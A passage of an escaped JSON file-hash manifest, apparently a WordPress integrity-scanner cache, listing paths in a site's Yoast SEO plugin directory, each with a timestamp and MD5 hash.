\/pimple\\/tests\\/019.phpt\":{\"d\":1545638235,\"h\":\"77326e4a890633751f8fff168843695f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/pimple\\/pimple\\/ext\\/pimple\\/tests\\/018.phpt\":{\"d\":1545638235,\"h\":\"9ebedf93af56740f91a2695f08456fe3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/pimple\\/pimple\\/ext\\/pimple\\/tests\\/017_1.phpt\":{\"d\":1545638235,\"h\":\"c076e300b4fdcae3100c1649838ab882\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/pimple\\/pimple\\/ext\\/pimple\\/tests\\/001.phpt\":{\"d\":1545638235,\"h\":\"355b3861c539a4ed63eca0e6b7d567fb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/pimple\\/pimple\\/ext\\/pimple\\/tests\\/016.phpt\":{\"d\":1545638235,\"h\":\"ee8b48b5565f7ebad44d58b0ff29a336\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/pimple\\/pimple\\/ext\\/pimple\\/tests\\/012.phpt\":{\"d\":1545638235,\"h\":\"015fc9d92ce1d2cafa115f011f408aab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/pimple\\/pimple\\/ext\\/pimple\\/tests\\/002.phpt\":{\"d\":1545638235,\"h\":\"3a108fb16d99c10aafab62ff05a6687c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/pimple\\/pimple\\/ext\\/pimple\\/tests\\/004.phpt\":{\"d\":1545638235,\"h\":\"92055c600b2e63bf9aac0131efc815a9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/pimple\\/pimple\\/ext\\/pimple\\/tests\\/003.phpt\":{\"d\":1545638235,\"h\":\"d36c65cd04dbe0fc0b4790124f6d509d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/pimple\\/pimple\\/ext\\/pimple\\/tests\\/009.phpt\":{\"d\":1545638235,\"h\":\"bc7ab7e33f184470318fe6aab86bc981\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/pimple\\/pimple\\/ext\\/pimple\\/tests\\/015.phpt\":{\"d\":1545638235,\"h\":\"626ca62d1a23071a458db26a1db75bae\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/pimple\\/pimple\\/ext\\/pimple\\/tests\\/bench_shared.phpb\":{\"d\":1545638235,\"h\":\"61ab3fb7f668d7d1e6ab9df3662b5609\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/pimple\\/pimple\\/ext\\/pimple\\/tests\\/011.phpt\":{\"d\":1545638235,\"h\":\"b536d807123c1ddf512334c6ace6f40a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/pimple\\/pimple\\/ext\\/pimple\\/tests\\/008.phpt\":{\"d\":1545638235,\"h\":\"c8441ecb896d475eea8b890a68b0d37f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/pimple\\/pimple\\/ext\\/pimple\\/tests\\/bench.phpb\":{\"d\":1545638235,\"h\":\"8b269eed3b695bea2ed90db1a4d818b1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/pimple\\/pimple\\/ext\\/pimple\\/tests\\/014.phpt\":{\"d\":1545638235,\"h\":\"12cddc08936a7a2533a42fc1522a5115\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/pimple\\/pimple\\/ext\\/pimple\\/tests\\/006.phpt\":{\"d\":1545638235,\"h\":\"95532c61ea7669801abb149f0c377fec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/pimple\\/pimple\\/ext\\/pimple\\/tests\\/005.phpt\":{\"d\":1545638235,\"h\":\"b482b2434c279afb4a9b7fbb0c40567c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/pimple\\/pimple\\/ext\\/pimple\\/pimple_compat.h\":{\"d\":1545638235,\"h\":\"726240296bf6b4781095d427d7519fcb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/pimple\\/pimple\\/ext\\/pimple\\/pimple.c\":{\"d\":1545638235,\"h\":\"2340b74fed6dc1617f10ddc840b156b1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/pimple\\/pimple\\/ext\\/pimple\\/config.w32\":{\"d\":1545638235,\"h\":\"5b49e8709c8d5e8957b599db0e728b73\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/pimple\\/pimple\\/ext\\/pimple\\/php_pimple.h\":{\"d\":1545638235,\"h\":\"dca491d55340eff12f5280e9687d4b28\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/pimple\\/pimple\\/ext\\/pimple\\/config.m4\":{\"d\":1545638235,\"h\":\"caaa96ddb3db722c5c027512d8b221e7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/pimple\\/pimple\\/LICENSE\":{\"d\":1545638235,\"h\":\"f146adc7d0607a9ecae7da1655669366\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/pimple\\/pimple\\/README.rst\":{\"d\":1545638235,\"h\":\"ff31170e8e5779ae3306692c5a8dff96\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/pimple\\/pimple\\/phpunit.xml.dist\":{\"d\":1545638235,\"h\":\"1e1be301b5f9bebf522cad3000f5798f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/pimple\\/pimple\\/CHANGELOG\":{\"d\":1545638235,\"h\":\"232ff0872b9d50971a22ea516eb4a139\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/autoload.php\":{\"d\":1545638232,\"h\":\"d90c6409abb923a9231c72328b00ab94\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/autoload_52.php\":{\"d\":1545638235,\"h\":\"202e2bfdc739bffbfd572bc9a1f7d7d2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/src\\/formatters\\/indexable-author-formatter.php\":{\"d\":1545638235,\"h\":\"8ba882586e35365cf9d4398bc8b2e2a4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/src\\/formatters\\/indexable-post-formatter.php\":{\"d\":1545638235,\"h\":\"78b6d3a616ba839bd26325d1b547e093\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/src\\/formatters\\/indexable-term-formatter.php\":{\"d\":1545638235,\"h\":\"d99043e1cbb0a8d3e07ba5f56da27402\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/src\\/loaders\\/indexable.php\":{\"d\":1545638235,\"h\":\"c96a7816e9f3c0b60995dcfd8cc37fea\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/src\\/watchers\\/indexable-author-watcher.php\":{\"d\":1545638235,\"h\":\"87a973e32632a14ab59135198348bcaa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/src\\/watchers\\/indexable-term-watcher.php\":{\"d\":1545638235,\"h\":\"06a8a91e33e1968c16adf7cbc7a68121\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/src\\/watchers\\/primary-term-watcher.php\":{\"d\":1545638235,\"h\":\"d99296eb5904c6437e9d787e63a86688\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/src\\/watchers\\/indexable-post-watcher.php\":{\"d\":1545638235,\"h\":\"ef452d7720032883bdadc3552b73d539\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/src\\/models\\/seo-meta.php\":{\"d\":1545638235,\"h\":\"e0a22dcb5b774d61cfc974484c5f6553\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/src\\/models\\/indexable-meta.php\":{\"d\":1545638235,\"h\":\"7d87613a5d4ca92864e395a7862463d7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/src\\/models\\/indexable.php\":{\"d\":1545638235,\"h\":\"af9e7ec5868744d27e8e954d2669c452\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/src\\/models\\/primary-term.php\":{\"d\":1545638235,\"h\":\"6233b04bda53b0dade3e50d53243e78a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/src\\/config\\/plugin.php\":{\"d\":1545638235,\"h\":\"c4952174e59e2e99174c3f93de2edc99\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/src\\/config\\/admin.php\":{\"d\":1545638235,\"h\":\"c64f11c2b8eea46d6a1ffacb25f74be2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/src\\/config\\/frontend.php\":{\"d\":1545638235,\"h\":\"9679232c75956d1efcf06134651ab753\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/src\\/config\\/upgrade.php\":{\"d\":1545638235,\"h\":\"fbb6c9300a744e7660f1dfcc668aca40\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/src\\/config\\/database-migration.php\":{\"d\":1545638235,\"h\":\"c077afa9776718745d644556bc7420d8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/src\\/config\\/dependency-management.php\":{\"d\":1545638235,\"h\":\"4aaec26460cfb6aecc5058a0259f0092\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/src\\/exceptions\\/missing-method.php\":{\"d\":1545638235,\"h\":\"95460fcfda875240bf99764565d0adb2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/src\\/exceptions\\/no-indexable-found.php\":{\"d\":1545638235,\"h\":\"fbf5eb86a4409b9f7285527d21da5b8f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/src\\/loggers\\/logger.php\":{\"d\":1545638235,\"h\":\"14445679ca5703b07c8640eafd1b584e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/src\\/loggers\\/migration-logger.php\":{\"d\":1545638235,\"h\":\"7755518ad323408d1854d24e4a29ca3d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/src\\/wordpress\\/integration.php\":{\"d\":1545638235,\"h\":\"bf59fac5bd30a23ed7ff85b1326e11a4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/src\\/wordpress\\/integration-group.php\":{\"d\":1545638235,\"h\":\"888a3a8d9e2b134a3091e4950e0f5d8d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/src\\/yoast-model.php\":{\"d\":1545638235,\"h\":\"acbc12abc1563561160e0fac733a51a1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/src\\/yoast-orm-wrapper.php\":{\"d\":1545638235,\"h\":\"81a7ab8797121dd6b070f98866f14bcb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/frontend\\/class-frontend-page-type.php\":{\"d\":1545638235,\"h\":\"eb418ce9fe9b75b23de33b4d5b9880a7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/frontend\\/class-primary-category.php\":{\"d\":1545638235,\"h\":\"0f94357759a5483f267a02942868ae7d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/frontend\\/class-frontend.php\":{\"d\":1545638235,\"h\":\"26b9094d6371380349704b707be65e20\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/frontend\\/class-remove-reply-to-com.php\":{\"d\":1545638235,\"h\":\"0182b7f630e7f8c097bc51e67a00f88c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/frontend\\/class-opengraph-image.php\":{\"d\":1545638235,\"h\":\"f5005354d236813d0bd450410feddbb6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/frontend\\/class-twitter.php\":{\"d\":1545638235,\"h\":\"bea93dadad750ce0361abb96a03ec5ac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/frontend\\/class-woocommerce-shop-page.php\":{\"d\":1545638235,\"h\":\"ff9113abe503ff46edae60f576937865\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/frontend\\/class-opengraph.php\":{\"d\":1545638235,\"h\":\"e9174dbfaaf13cf7db217631d7507091\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/frontend\\/class-breadcrumbs.php\":{\"d\":1545638235,\"h\":\"b4be25437e8083c692b567f08efdbca0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/frontend\\/index.php\":{\"d\":1545638235,\"h\":\"45d09bb48b4f308b8f63baab8f416733\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/frontend\\/class-opengraph-oembed.php\":{\"d\":1545638235,\"h\":\"0bb395f3bac0f9cc1003bf5da29e2165\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/frontend\\/class-json-ld.php\":{\"d\":1545638235,\"h\":\"0f173c81b7aea71383580099b2482e65\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/vendor\\/lodash.min.js\":{\"d\":1545638235,\"h\":\"3b37864847459979b900d7ba3e9f6114\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/vendor\\/lodash-noconflict.js\":{\"d\":1545638235,\"h\":\"05409c5c127e7df560896dcd9593963b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/hu.js\":{\"d\":1545638235,\"h\":\"8e0a7882caf41769c71cf8b55e84921a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/lt.js\":{\"d\":1545638235,\"h\":\"0449eaa75efc4a6a8df49f0d09566d71\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/lv.js\":{\"d\":1545638235,\"h\":\"b9b5f137ea0aea4e8efa22f4c533dce7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/hsb.js\":{\"d\":1545638235,\"h\":\"213d5d63719b1b0d0652e736436259b5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/hr.js\":{\"d\":1545638235,\"h\":\"58298a99909eee026ae4e5600fff8dea\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/ro.js\":{\"d\":1545638235,\"h\":\"27baf44dfbf15cf2fee1ccddaab58f00\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/ar.js\":{\"d\":1545638235,\"h\":\"fccf8fa387c987050179d0f42d6896a8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/hy.js\":{\"d\":1545638235,\"h\":\"299347cb3955fbc307794321436eeece\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/eu.js\":{\"d\":1545638235,\"h\":\"00e8957b3e8cdb96ef059850ac3c68c5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/da.js\":{\"d\":1545638235,\"h\":\"57e8b1e6e3161eda0402882bdd6a085a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/bs.js\":{\"d\":1545638235,\"h\":\"c84b6db506aecea232c186e274d6e9d4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/gl.js\":{\"d\":1545638235,\"h\":\"235993b6dd1761e5637974759f5eda7a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/fi.js\":{\"d\":1545638235,\"h\":\"d3d0e8f83e3887c25701c6e4fa2fe334\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/nb.js\":{\"d\":1545638235,\"h\":\"780c7d4ca5e5b34f0daf91bb1ddc65a4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/zh-CN.js\":{\"d\":1545638235,\"h\":\"569baf3c0a1e92d2c2707d3231692e15\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/el.js\":{\"d\":1545638235,\"h\":\"efa6e193d62fa1561e6b163065e7fc35\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/uk.js\":{\"d\":1545638235,\"h\":\"2b952e4205b7e4285dfada3bc018906a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/pt-BR.js\":{\"d\":1545638235,\"h\":\"b80e354c3598aa02460eee6d83b459bd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/id.js\":{\"d\":1545638235,\"h\":\"d362e1fdf9136f4a30f51012b7b8d4a2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/ru.js\":{\"d\":1545638235,\"h\":\"333dc144a29181ce03d86d04629fceba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/sr-Cyrl.js\":{\"d\":1545638235,\"h\":\"38e1dcd92b49b6b15db670b0a17b6ee7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/fa.js\":{\"d\":1545638235,\"h\":\"34664c7f3ff42c8e04dceb13b046b365\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/ja.js\":{\"d\":1545638235,\"h\":\"a513741667eede9486bc13349b2622d2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/sl.js\":{\"d\":1545638235,\"h\":\"f9a6a8c80efe20b507dc95f83d086fd8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/sk.js\":{\"d\":1545638235,\"h\":\"4f8e125ed3510cba3ba70c67c0904a64\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/bg.js\":{\"d\":1545638235,\"h\":\"bb375aa326e7b645e24937ecb4e5e602\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/ca.js\":{\"d\":1545638235,\"h\":\"a41c9f772c717d59f413e808723b207e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/af.js\":{\"d\":1545638235,\"h\":\"22eb689d5bbaf0ceab4ce54dd58b2f76\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/de.js\":{\"d\":1545638235,\"h\":\"2aa2959f96465f158c4cde94fde5bb4c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/dsb.js\":{\"d\":1545638235,\"h\":\"9476fdcdc929a8b8a759ff10eb8cecde\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/he.js\":{\"d\":1545638235,\"h\":\"16849bc86cfd816a71c9affa0ad94156\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/sv.js\":{\"d\":1545638235,\"h\":\"87b4585bd3c7ef517b7609c3a75a1174\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/et.js\":{\"d\":1545638235,\"h\":\"c35b16125acccfc3f36eef6725a61299\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/zh-TW.js\":{\"d\":1545638235,\"h\":\"261326600ce25581979b60e26a51cf21\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/en.js\":{\"d\":1545638235,\"h\":\"8d90f309724286ae804fe5e501ba2bde\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/es.js\":{\"d\":1545638235,\"h\":\"d703f83df2e2ed712fcb2fed8f9668d4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/tr.js\":{\"d\":1545638235,\"h\":\"58a4e9829081626b1aaad3d46ccbdddf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/cs.js\":{\"d\":1545638235,\"h\":\"fda2b8388c385dd662749d48f0d9df41\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/nl.js\":{\"d\":1545638235,\"h\":\"915f5e0cb81407c432fe94bbca1cae85\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/is.js\":{\"d\":1545638235,\"h\":\"b74ad80e6c02bdd177dcbbdab756b16c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/fr.js\":{\"d\":1545638235,\"h\":\"513900413ec7351025eb0b6ca879d41b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/hi.js\":{\"d\":1545638235,\"h\":\"7c367dce88125572370c7253da2764e9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/ko.js\":{\"d\":1545638235,\"h\":\"2db7fd9ab54e75d8d4ded6abcbdb9c6c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/sr.js\":{\"d\":1545638235,\"h\":\"bea46ab6f8cecee10a5ed9117132340e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/az.js\":{\"d\":1545638235,\"h\":\"239914a2794e378ef6cbf50c329a5c2e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/km.js\":{\"d\":1545638235,\"h\":\"c9bfa4dc94e6b241deeceea9cd33a21d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/th.js\":{\"d\":1545638235,\"h\":\"f9174e84a42f5ea14ecfdbdf7ccc27bb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/it.js\":{\"d\":1545638239,\"h\":\"9fa7b64a951a97007d9c097a266eb3fc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/pl.js\":{\"d\":1545638239,\"h\":\"f2749b2c4a575f4611554725fdc369d0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/ms.js\":{\"d\":1545638239,\"h\":\"048ca2058665aa5b1925e4d571e56534\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/vi.js\":{\"d\":1545638239,\"h\":\"91f875052ac9c9c97850c3528c61ec3e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/ps.js\":{\"d\":1545638239,\"h\":\"faa2a36c152eade110f7844b6c328406\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/js\\/dist\\/select2\\/i18n\\/pt.js\":{\"d\":1545638239,\"h\":\"ca0b66a